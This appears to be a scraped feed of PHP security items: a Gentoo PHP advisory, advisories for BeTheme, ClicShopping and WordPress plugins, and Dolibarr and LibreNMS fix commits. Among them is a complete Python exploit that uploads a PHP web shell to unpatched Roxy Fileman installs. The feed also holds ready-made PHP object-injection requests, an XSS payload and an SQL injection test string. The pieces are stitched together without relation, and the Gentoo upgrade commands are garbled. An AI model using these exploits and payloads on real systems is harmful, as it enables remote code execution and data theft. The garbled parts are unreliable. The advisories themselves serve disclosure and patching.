Gentoo Linux Security Advisory 202211-3 - Multiple vulnerabilities have been found in PHP, the worst of which could result in arbitrary code execution. Versions less than 7.4.33:7.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                          https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: Normal  
   Title: PHP: Multiple Vulnerabilities  
    Date: November 19, 2022  
    Bugs: #867913, #873376, #877853  
      ID: 202211-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in PHP, the worst of which  
could result in arbitrary code execution.

Background  
=========  
PHP is a widely-used general-purpose scripting language that is  
especially suited for Web development and can be embedded into HTML.

Affected packages  
================  
-------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-lang/php      < 7.4.33:7.4             >= 7.4.33:7.4  
                                < 8.0.25:8.0             >= 8.0.25:8.0  
                                < 8.1.12:8.1               >= 8.1.12:8.1

Description  
==========  
Multiple vulnerabilities have been discovered in PHP. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All PHP 7.4 users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">Þv-lang/php-7.4.33"

All PHP 8.0 users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">Þv-lang/php-8.0.25"

All PHP 8.1 users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">Þv-lang/php-8.1.12"

References  
=========  
[ 1 ] CVE-2022-31628  
     https://nvd.nist.gov/vuln/detail/CVE-2022-31628  
[ 2 ] CVE-2022-31629  
     https://nvd.nist.gov/vuln/detail/CVE-2022-31629  
[ 3 ] CVE-2022-31630  
     https://nvd.nist.gov/vuln/detail/CVE-2022-31630  
[ 4 ] CVE-2022-37454  
     https://nvd.nist.gov/vuln/detail/CVE-2022-37454

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

https://security.gentoo.org/glsa/202211-03

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202211-03

Roxy Fileman versions 1.4.6 and below remote shell upload proof of concept exploit.

    # Exploit Title: Roxy Fileman <= 1.4.6 Arbitrary File Upload (Unathenticated)# Date: 11/12/2022# Exploit Author: Hadi Mene <hadi_mene@hotmail.com># Vendor Homepage: roxyfileman.com# Software Link: https://web.archive.org/web/20210126213412/https://roxyfileman.com/download.php?f=1.4.6-php# Version: <= 1.4.6# Tested on: Ubuntu 18.04 # CVE : CVE-2022-40797# https://nvd.nist.gov/vuln/detail/CVE-2022-40797 import requestsfrom optparse import OptionParserfrom os.path import basenamebanner =  '#################################################\n'banner += '# Roxy Fileman <= 1.4.6 Arbitrary File Upload   #\n'banner += '#\t\t\t\t\t\t#\n'banner += '#\tCVE-2022-40797 exploit code\t\t#\n'banner += '#\t\t\t\t\t\t#\n'banner += '#\t\t\t\t\t\t#\n'banner += '#  Author : Hadi Mene <hadi_mene@hotmail.com>\t#\n'banner += '#\t\t\t\t\t\t#\n'banner += '#################################################\n'parser = OptionParser()parser.add_option("-u", "--url", dest="url",                  help="url of roxy fileman installation")parser.add_option("-s", "--shell",dest="shell", default=False,                  help="path of the php shell if not specified defaut shell will be uploaded ")(options, args) = parser.parse_args()if options.url is None:  parser.error('URL is required use -h for help')url = options.url#It seems that in some versions of the app an '/' in the end of the url breaks the exploit codeif (url.endswith('/')):  url = url[:-1] # we delete that '/'  webroot = options.url.split('/')[3:]webroot = '/'+ '/'.join(webroot)if (webroot.endswith('/')):  webroot = webroot[:-1]  webroot = webroot+'/Uploads'if options.shell:  shell = open(options.shell,'r').read()  filename = basename(options.shell)  filename = filename.split('.')[0]  else:  # default shell  shell = "<?php system($_GET['cmd']); ?>"  filename = 'shell'headers = {    'Host': (url.split('/')[2]),    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',    'Accept': '*/*',    'Accept-Language': 'en-US,en;q=0.5',    'Content-Type': 'multipart/form-data; boundary=---------------------------39556237418830295983527604767',    'Origin': (url.split('/')[2]),    'Connection': 'close',}data = '-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="method"\r\n\r\najax\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="d"\r\n\r\n'+(webroot)+'\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="files[]"; filename="'+(filename)+'.phar"\r\nContent-Type: text/plain\r\n\r\n'+shell+'\n\r\n-----------------------------39556237418830295983527604767--\r\n'#We check if a file with the same filename is already there #because Roxy doesn't overwrite file instead it changes the filename of the newly uploaded fileif 'href="'+filename+'.phar"' in (requests.get(url+'/Uploads/').text):  already_uploaded = Trueelse:  already_uploaded = False  # file uploadreq = requests.post(url+'/php/upload.php', headers=headers, data=data, verify=False)response = (req.text)print(banner)if '{"res":"ok","msg":""}' in (response):# success  print('File Uploaded Successfully!!!')    if already_uploaded:    print('A file with the same filename is already on the server..')    print('URL: '+url+'/Uploads/'+(filename)+' - Copy X.phar ')      else:    print('URL: '+url+'/Uploads/'+(filename)+'.phar')else:  # failure  print('Shell Upload Failed :((( ')  print(response) #debug

Roxy Fileman 1.4.6 Remote Shell Upload

WordPress BeTheme theme version 26.5.1.4 suffers from multiple PHP object injection vulnerabilities when processing input.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Betheme  
Vendor URL:     https://muffingroup.com/betheme/  
Type:           Deserialization of Untrusted Data [CWE-502]  
Date found:     2022-11-02  
Date published: 2022-11-18  
CVSSv3 Score:   8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)  
CVE:            CVE-2022-3861

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
BeTheme 26.5.1.4 and below

4. INTRODUCTION  
===============  
Ever since Betheme was just an idea, we knew that it would be different from all  
other multipurpose WordPress themes we’d tried before.

We wanted to build something more than just another WordPress theme, that could  
easily adapt to any project you need to work on without writing any code. A theme  
designed from scratch to save your time & help you enjoy your freedom...

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The WordPress theme is vulnerable to multiple PHP Object injections when processing  
input to multiple, privileged Wordpress ajax routes:

-mfn_builder_import -> "mfn-items-import" parameter  
-mfn_builder_import_page -> "mfn-items-import-page" parameter  
-importdata -> "import" parameter  
-importsinglepage -> "import" parameter  
-importfromclipboard -> "import" parameter

To successfully exploit this vulnerability, an attacker must be authenticated with at  
least Wordpress "Contributer" rights.

Successful exploits can allow the attacker to execute arbitrary code.

6. PROOF OF CONCEPT  
===================  
To exploit the "mfn_builder_import" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 75  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "mfn_builder_import_page" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 123  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/

To exploit the "importdata" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 114  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "importsinglepage" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 83  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/

To exploit the "importfromclipboard" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 123  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

7. SOLUTION  
===========  
Update to version 26.6

8. REPORT TIMELINE  
==================  
2022-11-01: Discovery of the vulnerability  
2022-11-03: CVE requested from Wordfence (CNA)  
2022-11-04: Wordfence assigns CVE-2022-3861  
2022-11-08: Vendor notification  
2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn't respond  
2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability  
2022-11-18: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

WordPress BeTheme 26.5.1.4 PHP Object Injection

ClicShopping version 3.402 suffers from a cross site scripting vulnerability.

    ## Title: ClicShopping_V3-Version3.402 XSS-Reflected## Author: nu11secur1ty## Date: 11.20.2022## Vendor: https://www.clicshopping.org/forum/## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3## Description:The name of an arbitrarily supplied URL parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The attacker can trick users to open a very dangerous link or he canget sensitive information, also he can destroy some components of yoursystem.## STATUS: HIGH Vulnerability[+] Payload:```jsGET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)## Proof and Exploit:[href](https://streamable.com/mgbftx)## Time spent`1:00`

ClicShopping 3.402 Cross Site Scripting

The Betheme theme for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 26.5.1.4 via deserialization of untrusted input supplied via the import, mfn-items-import-page, and mfn-items-import parameters passed through the mfn_builder_import, mfn_builder_import_page, importdata, importsinglepage, and importfromclipboard functions. This makes it possible for authenticated attackers, with contributor level permissions and above to inject a PHP Object. The additional presence of a POP chain would make it possible for attackers to execute code, retrieve sensitive data, delete files, etc..

CVE-2022-3861: Vulnerability Advisories Continued - Wordfence

The WP-Polls WordPress plugin before 2.76.0 prioritizes getting a visitor's IP from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass IP-based limitations to vote in certain situations.

**Disclosure**: _This is a global disclosure for product review articles on HighTechDad. It does not apply to Automobile reviews and there are other exceptions. Therefore, it may or may not be applicable to this particular article._ I may have a material connection because I may have received a sample of a product for consideration in preparing to review the product and write this or other content. I was/am not expected to return the item after my review period. All opinions within this and other articles are my own and are typically not subject to the editorial review from any 3rd party. Also, some of the links in the post above may be “affiliate” or “advertising” links. These may be automatically created or placed by me manually. This means if you click on the link and purchase the item (sometimes but not necessarily the product or service being reviewed), I will receive a small affiliate or advertising commission. More information can be found on my About page.

CVE-2022-1581: WARNING: WP-Polls WordPress Poll Plugin Can Be Exploited - HighTechDad™

SQL injection attacks can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information. Many high-profile data breaches in recent years have been the result of SQL injection attacks, leading to reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into an organization's systems, leading to a long-term compromise that can go unnoticed for an extended period. This affect 16.0.1 and 16.0.2 only. 16.0.0 or lower, and 16.0.3 or higher are not affected

@@ -0,0 +1,178 @@ <?php /\* Copyright (C) 2010 Laurent Destailleur <eldy@users.sourceforge.net> \* \* This program is free software; you can redistribute it and/or modify \* it under the terms of the GNU General Public License as published by \* the Free Software Foundation; either version 3 of the License, or \* (at your option) any later version. \* \* This program is distributed in the hope that it will be useful, \* but WITHOUT ANY WARRANTY; without even the implied warranty of \* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \* GNU General Public License for more details. \* \* You should have received a copy of the GNU General Public License \* along with this program. If not, see <https://www.gnu.org/licenses/>. \* or see https://www.gnu.org/ \*/  
/\*\* \* \\file test/phpunit/WebsiteTest.php \* \\ingroup test \* \\brief PHPUnit test \* \\remarks To run this script as CLI: phpunit filename.php \*/  
global $conf,$user,$langs,$db; //define('TEST\_DB\_FORCE\_TYPE','mysql'); // This is to force using mysql driver //require\_once 'PHPUnit/Autoload.php';  
if (! defined('NOREQUIRESOC')) { define('NOREQUIRESOC', '1'); } if (! defined('NOCSRFCHECK')) { define('NOCSRFCHECK', '1'); } if (! defined('NOTOKENRENEWAL')) { define('NOTOKENRENEWAL', '1'); } if (! defined('NOREQUIREMENU')) { define('NOREQUIREMENU', '1'); // If there is no menu to show } if (! defined('NOREQUIREHTML')) { define('NOREQUIREHTML', '1'); // If we don't need to load the html.form.class.php } if (! defined('NOREQUIREAJAX')) { define('NOREQUIREAJAX', '1'); } if (! defined("NOLOGIN")) { define("NOLOGIN", '1'); // If this page is public (can be called outside logged session) } if (! defined("NOSESSION")) { define("NOSESSION", '1'); }  
require\_once dirname(\_\_FILE\_\_).'/../../htdocs/main.inc.php'; require\_once dirname(\_\_FILE\_\_).'/../../htdocs/core/lib/website.lib.php';  
  
if (empty($user\->id)) { print "Load permissions for admin user nb 1\\n"; $user\->fetch(1); $user\->getrights(); } $conf\->global\->MAIN\_DISABLE\_ALL\_MAILS\=1;  
  
/\*\* \* Class for PHPUnit tests \* \* @backupGlobals disabled \* @backupStaticAttributes enabled \* @remarks backupGlobals must be disabled to have db,conf,user and lang not erased. \*/ class WebsiteTest extends PHPUnit\\Framework\\TestCase { protected $savconf; protected $savuser; protected $savlangs; protected $savdb;  
/\*\* \* Constructor \* We save global variables into local variables \* \* @return SecurityTest \*/ public function \_\_construct() { parent::\_\_construct();  
//$this->sharedFixture global $conf,$user,$langs,$db; $this\->savconf\=$conf; $this\->savuser\=$user; $this\->savlangs\=$langs; $this\->savdb\=$db;  
print \_\_METHOD\_\_." db->type=".$db\->type." user->id=".$user\->id; //print " - db ".$db->db; print "\\n"; }  
/\*\* \* setUpBeforeClass \* \* @return void \*/ public static function setUpBeforeClass() { global $conf,$user,$langs,$db; $db\->begin(); // This is to have all actions inside a transaction even if test launched without suite.  
print \_\_METHOD\_\_."\\n"; }  
/\*\* \* tearDownAfterClass \* \* @return void \*/ public static function tearDownAfterClass() { global $conf,$user,$langs,$db; $db\->rollback();  
print \_\_METHOD\_\_."\\n"; }  
/\*\* \* Init phpunit tests \* \* @return void \*/ protected function setUp() { global $conf,$user,$langs,$db; $conf\=$this\->savconf; $user\=$this\->savuser; $langs\=$this\->savlangs; $db\=$this\->savdb;  
print \_\_METHOD\_\_."\\n"; }  
/\*\* \* End phpunit tests \* \* @return void \*/ protected function tearDown() { print \_\_METHOD\_\_."\\n"; }  
  
/\*\* \* testGetPagesFromSearchCriterias \* \* @return void \*/ public function testGetPagesFromSearchCriterias() { global $db;  
$s = "123') OR 1=1-- \\' xxx"; /\* var\_dump($s); var\_dump($db->escapeforlike($s)); var\_dump($db->escape($db->escapeforlike($s))); \*/  
$res = getPagesFromSearchCriterias('page,blogpost', 'meta,content', $s, 2, 'date\_creation', 'DESC', 'en'); //var\_dump($res); print \_\_METHOD\_\_." message=".$res\['code'\]."\\n"; // We must found no line (so code should be KO). If we found somethiing, it means there is a SQL injection of the 1=1 $this\->assertEquals($res\['code'\], 'KO'); } }

CVE-2022-4093: Fix sqli ->escape after ->escapeforlike · Dolibarr/dolibarr@7c1eac9

Insufficient Session Expiration in GitHub repository librenms/librenms prior to 22.10.0.

@@ -0,0 +1,30 @@

<?php

  

namespace App\\Http\\Middleware;

  

use Closure;

use Illuminate\\Http\\Request;

use Illuminate\\Support\\Facades\\Auth;

  

class VerifyUserEnabled

{

/\*\*

\* Handle an incoming request.

\*

\* @param \\Illuminate\\Http\\Request $request

\* @param \\Closure(\\Illuminate\\Http\\Request): (\\Illuminate\\Http\\Response|\\Illuminate\\Http\\RedirectResponse) $next

\* @return \\Illuminate\\Http\\Response|\\Illuminate\\Http\\RedirectResponse

\*/

public function handle(Request $request, Closure $next)

{

if (Auth::check() && ! Auth::user()->enabled) {

Auth::logout();

$request\->session()->invalidate();

$request\->session()->regenerateToken();

  

return redirect()->route('login')->withErrors(\['msg' => \_\_('auth.disabled')\]);

}

  

return $next($request);

}

}

CVE-2022-4070: Block disabled user session auth · librenms/librenms@ce8e5f3

Block BYPASS vulnerability in iQ Block Country plugin <= 1.2.18 on WordPress.

CVE-2022-41155: iQ Block Country

Unauthenticated Error Log Disclosure vulnerability in Media Library Assistant plugin <= 3.00 on WordPress.

Tag

#php